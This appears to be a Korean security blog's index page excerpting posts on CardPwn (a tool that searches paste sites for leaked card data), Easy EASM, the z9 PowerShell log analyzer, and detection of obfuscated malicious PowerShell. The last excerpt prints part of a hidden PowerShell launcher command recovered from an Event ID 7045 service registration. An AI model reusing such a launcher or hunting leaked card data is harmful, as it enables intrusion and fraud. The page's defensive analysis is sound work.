본문 바로가기
반응형

분류 전체보기176

CardPwn 개인정보유출 테스트 (Fullz) 🔹 CardPwnCardPwn는 유출된 신용카드 정보를 찾는 OSINT 오픈소스 도구입니다.이 도구는 Python으로 작성되어있고, 설치와 사용법 또한 간단합니다.💡 이 도구는 카드 정보를 특정 웹사이트로 쿼리하여 응답받은 결과를 표현해주는 것이기에 많은 정보가 나오지 않을 수 있습니다. 그냥 이런 도구도 있구나, 이런 사이트들도 있구나 하고 한번쯤은 테스트를 해볼만하다…!  🔹 CardPwn에서 유출된 카드 정보 검색에 사용되는 웹사이트cl1p.netdpastedumpz.orghastebinideonepastebinpw.fabian-fingerle.degist.github.comheypasteit.comivpaste.commysticpaste.compaste.org.rupaste2.orgsebsa.. 2024. 9. 23.
Easy EASM 무료 도구(Free Tool) 💻 테스트 환경 : kali-linux 2022.2🔹 Easy EASM 란Easy EASM은 조직에 외부 자산에 대한 가시성을 제공하는 다루기 쉬운 도구입니다.Easy EASM은 10줄 이하의 설정, 오픈 소스 도구 사용 및 원버튼 배포를 통해 외부에 노출된 자산관리를 쉽게 할 수 있습니다.Easy EASM은 매일 사용자를 스캔하고 새로 발견된 자산에 대해 Slack 또는 Discord를 통해 알림을 전달할 수 있습니다. 또한 EASM 수행 결과를 Excel(CSV) 형태 파일로 저장할 수 있습니다. 💡 EASM(External Attack Surface Management, 외부 공격 표면 관리)🔹 EASM은 외부에 노출되어 있는 조직의 정보를 수집하여 조직의 외부 및 내부 자산의 잠재적인 취약.. 2024. 9. 23.
z9 파워쉘 로그 분석기(Powershell Log Analyzer) 🔹 z9 Powershell Log Analyzer파워쉘 이벤트 로그를 분석하여 파워쉘 코드를 분석하고 악성 아티팩트를 탐지하는 도구입니다. 🔹 설치테스트 환경 : Kali-linux 2022.2, python3.11 z9 설치>> git clone https://github.com/Sh1n0g1/z9  🔹 사용법파워쉘 로그 XML파일로 수집하는 방법util 디렉터리를 윈도우 OS로 복사합니다.enable_powershell_logging.reg 파일을 실행하여 파워쉘 로그가 기록되도록 설정합니다. * reg 파일 실행 후 재부팅 1회 필요collect_psevent.bat 배치 파일을 실행하면 log 폴더에 파워쉘 관련 로그가 XML 파일로 생성됩니다. 기본 사용법z9.py 파일을 다음 명령어로 .. 2024. 9. 23.
난독화 악성 파워쉘 코드 탐지 및 분석 자료 악성 코드 탐지윈도우 이벤트에서 수상한 서비스 등록을 확인 및 난독화 코드 발견윈도우 이벤트 뷰어 - 시스템 - Event ID 7045(서비스 등록)**7045**04000x8080000000000000xxxxxxSystemPC123- xxrandomSevicenamexxx%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s... 2024. 9. 23.
반응형